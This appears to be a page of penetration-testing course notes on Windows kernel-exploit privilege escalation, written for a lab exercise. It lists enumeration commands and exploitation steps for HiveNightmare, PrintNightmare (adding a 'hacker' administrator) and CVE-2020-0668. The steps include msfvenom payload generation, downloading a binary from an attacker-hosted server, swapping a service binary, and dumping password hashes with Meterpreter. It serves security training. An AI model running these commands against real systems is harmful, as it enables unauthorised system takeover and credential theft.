16.Kernel-exploits

Enumeration Commands

systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolss

Exploitation Commands

HiveNightmare.exe
impacket-secretsdump
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
msfvenom
python3 -m http.server <port>
wget http://<ip>:<port>/<file>
CVE-2020-0668.exe <source> <destination>
copy /Y <source> <destination>
msfconsole -r <resource_file>
net start MozillaMaintenance

Verification Commands

net user hacker
getuid # (Meterpreter)
hashdump # (Meterpreter)

Key Concepts:

  • Kernel Exploits:

    • Exploit vulnerabilities in the Windows kernel for privilege escalation.

    • Patching is crucial, but often incomplete.

  • Historical Vulnerabilities:

    • MS08-067 (Server service RCE).

    • MS17-010 (EternalBlue, SMB RCE).

    • ALPC Task Scheduler 0-Day (Local privilege escalation).

    • CVE-2021-36934 (HiveNightmare, registry access).

    • CVE-2021-1675/CVE-2021-34527 (PrintNightmare, print spooler RCE).

    • CVE-2020-0668 (Service Tracing local privilege escalation).

  • Patch Management:

    • Importance of keeping systems updated.

    • Older vulnerabilities remain relevant.

Approach, Commands, Tools, and Techniques:

  1. Enumeration:

    • systeminfo, wmic qfe list brief, Get-Hotfix (Installed updates).

    • icacls (File permissions).

    • whoami /priv (User privileges).

    • ls \\localhost\pipe\spoolss (Spooler service check).

  2. Exploitation:

    • HiveNightmare (CVE-2021-36934):

      • HiveNightmare.exe (Dump registry hives).

      • impacket-secretsdump (Extract hashes).

    • PrintNightmare (CVE-2021-1675/CVE-2021-34527):

      • Set-ExecutionPolicy Bypass -Scope Process (Bypass PowerShell execution policy).

      • Import-Module .\CVE-2021-1675.ps1 (Import PowerShell exploit).

      • Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" (Add local admin).

    • CVE-2020-0668 (Service Tracing):

      • Build exploit in Visual Studio.

      • msfvenom (Generate malicious binary).

      • Python HTTP server, wget (Download binary).

      • CVE-2020-0668.exe (Run exploit).

      • copy (Replace service binary).

      • Metasploit resource script, msfconsole -r (Start listener).

      • net start MozillaMaintenance (Start service).

  3. Verification:

    • net user hacker (Verify user creation).

    • getuid (Meterpreter, verify SYSTEM privileges).

    • hashdump (Meterpreter, dump password hashes).

Commands:

  • systeminfo, wmic qfe list brief, Get-Hotfix, icacls, whoami /priv, ls, Set-ExecutionPolicy, Import-Module, Invoke-Nightmare, msfvenom, python3 -m http.server, wget, copy, msfconsole, net user, net start, getuid, hashdump, impacket-secretsdump.

Tools:

  • HiveNightmare.exe, impacket, Metasploit, PowerShell scripts, custom exploits.

Task:

  • RDP to the target.

  • Exploit HiveNightmare, PrintNightmare, and CVE-2020-0668.

  • Escalate privileges to NT AUTHORITY\SYSTEM.

  • Retrieve the flag from the Administrator Desktop.

Previous15.Weak-permissionsNext17.Vulnerable-services

Last updated